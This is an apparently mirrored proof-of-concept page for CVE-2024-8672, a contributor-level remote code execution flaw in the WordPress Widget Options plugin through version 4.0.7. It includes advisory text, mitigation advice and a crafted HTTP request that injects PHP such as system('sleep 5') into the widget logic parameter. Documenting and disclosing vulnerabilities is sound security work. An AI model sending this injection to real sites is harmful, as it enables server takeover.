Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-8672 PoC — Widget Options – The #1 WordPress Widget & Block Control Plugin <= 4.0.7 - Authenticated (Contributor+) Remote Code Exec

Source
https://github.com/Chocapikk/CVE-2024-8672
Associated Vulnerability
Title:Widget Options – The #1 WordPress Widget & Block Control Plugin <= 4.0.7 - Authenticated (Contributor+) Remote Code Execution (CVE-2024-8672)
Description:The Widget Options – The #1 WordPress Widget & Block Control Plugin plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7 via the display logic functionality that extends several page builders. This is due to the plugin allowing users to supply input that will be passed through eval() without any filtering or capability checks. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. Special note: We suggested the vendor implement an allowlist of functions and limit the ability to execute commands to just administrators, however, they did not take our advice. We are considering this patched, however, we believe it could still be further hardened and there may be residual risk with how the issue is currently patched.
Description
Widget Options – The #1 WordPress Widget & Block Control Plugin <= 4.0.7 - Authenticated (Contributor+) Remote Code Execution
Readme
# CVE-2024-8672: Authenticated Contributor Remote Code Execution in Widget Options Plugin

## Description

The **Widget Options** WordPress plugin (version 4.0.7 and earlier) is vulnerable to **Authenticated Contributor Remote Code Execution (RCE)**. This vulnerability allows authenticated users with **Contributor** privileges or higher to execute arbitrary PHP code on the server. 

The issue arises from the use of the `widgetopts_safe_eval()` function, which directly evaluates user-supplied input within the `logic` feature of widgets. This improper handling enables attackers to inject and execute malicious PHP code.

## Vulnerability Details

- **Plugin:** Widget Options
- **Version:** 4.0.7 and earlier
- **Vulnerability Type:** Authenticated Remote Code Execution (RCE)
- **CVE:** [CVE-2024-8672](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/widget-options/widget-options-the-1-wordpress-widget-block-control-plugin-407-authenticated-contributor-remote-code-execution)
- **Exploitation Requirements:**
  - Valid credentials with **Contributor** or higher privileges.

## Proof of Concept (PoC)

The following example demonstrates how to exploit the vulnerability to execute the `sleep` command, causing a delay in the server's response.

### Request Example

```http
GET /wp-json/wp/v2/block-renderer/core/latest-comments?context=edit&attributes[commentsToShow]=5&attributes[displayAvatar]=true&attributes[displayDate]=true&attributes[displayExcerpt]=true&attributes[extended_widget_opts][class][logic]=system('sleep 5');&post_id=91&_locale=site HTTP/1.1
Host: localhost:5555
X-WP-Nonce: 365b68356c
Cookie: wordpress_logged_in_fake_cookie=invalid|123456789|fake_cookie
```

### Steps to Reproduce

1. Authenticate to WordPress with a Contributor account.
2. Obtain a valid **nonce** for API requests (e.g., using the browser DevTools while editing a post).
3. Send the crafted request to inject and execute the PHP logic.

## Impact

- Exploiting this vulnerability allows authenticated users to execute arbitrary PHP commands, leading to a full compromise of the WordPress site and its hosting server.

## Mitigation

To mitigate this issue:
- Update the **Widget Options** plugin to the patched version 4.0.8.
- Restrict access to Contributor accounts and review permissions.
- Use a Web Application Firewall (WAF) to block malicious requests. 

## Proof of Execution

The following screenshot demonstrates the execution of the `sleep` command via the provided PoC, showing the delayed response time.

![Proof of Concept Screenshot](img/CVE-2024-8672.png)
File Snapshot

 [4.0K]  /data/pocs/9fab74bd92600341f622003397ebc8f9c264c13f
├── [4.0K]  img
│   └── [135K]  CVE-2024-8672.png
└── [2.5K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →